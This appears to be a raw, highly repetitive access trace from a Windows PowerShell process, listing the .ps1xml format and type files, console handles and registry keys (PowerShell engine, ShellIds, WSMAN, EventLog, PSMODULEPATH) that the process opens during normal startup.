c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
